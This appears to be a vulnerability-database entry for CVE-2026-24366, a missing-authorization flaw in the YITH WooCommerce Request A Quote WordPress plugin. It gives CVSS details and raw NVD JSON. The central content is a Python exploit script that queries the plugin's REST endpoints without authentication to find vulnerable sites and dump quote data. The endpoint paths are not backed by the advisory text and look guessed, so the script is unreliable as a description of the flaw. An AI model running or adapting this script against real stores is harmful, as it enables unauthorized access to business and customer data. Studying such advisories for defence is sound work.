Security Vulnerability Report
中文
CVE-2026-24366 CVSS 5.3 MEDIUM

CVE-2026-24366

Published: 2026-01-22 17:16:40
Last Modified: 2026-04-28 03:16:04

Description

Missing Authorization vulnerability in YITHEMES YITH WooCommerce Request A Quote yith-woocommerce-request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YITH WooCommerce Request A Quote: from n/a through <= 2.46.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YITH WooCommerce Request A Quote <= 2.46.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-24366 PoC - Missing Authorization in YITH WooCommerce Request A Quote # Target: WordPress site with YITH WooCommerce Request A Quote plugin <= 2.46.0 TARGET_URL = "http://target-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-24366 This vulnerability allows unauthenticated access to quote management endpoints """ # Try to access quote list endpoint without authentication endpoints = [ f"{TARGET_URL}/wp-json/yith-woocommerce-request-a-quote/v1/quotes", f"{TARGET_URL}/wp-json/yith-woocommerce-request-a-quote/v1/quote-requests", f"{TARGET_URL}/?rest_route=/yith-woocommerce-request-a-quote/v1/quotes" ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) # If status code is 200 and contains quote data, vulnerability exists if response.status_code == 200: print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def exploit_authorization_bypass(): """ Exploit the missing authorization vulnerability to retrieve quote data without authentication """ exploit_url = f"{TARGET_URL}/wp-json/yith-woocommerce-request-a-quote/v1/quotes" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } try: # Unauthenticated request - should fail but doesn't due to vulnerability response = requests.get(exploit_url, headers=headers, timeout=10) if response.status_code == 200: print("[!] Authorization bypass successful - sensitive data exposed") print(f"[+] Retrieved data: {response.json()}") return response.json() else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": print("CVE-2026-24366 Exploitation Script") print("Target: YITH WooCommerce Request A Quote <= 2.46.0") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24366", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:40.060", "lastModified": "2026-04-28T03:16:03.710", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in YITHEMES YITH WooCommerce Request A Quote yith-woocommerce-request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YITH WooCommerce Request A Quote: from n/a through <= 2.46.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en YITHEMES YITH WooCommerce Request A Quote yith-woocommerce-request-a-quote permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a YITH WooCommerce Request A Quote: desde n/a hasta &lt;= 2.46.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/yith-woocommerce-request-a-quote/vulnerability/wordpress-yith-woocommerce-request-a-quote-plugin-2-46-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}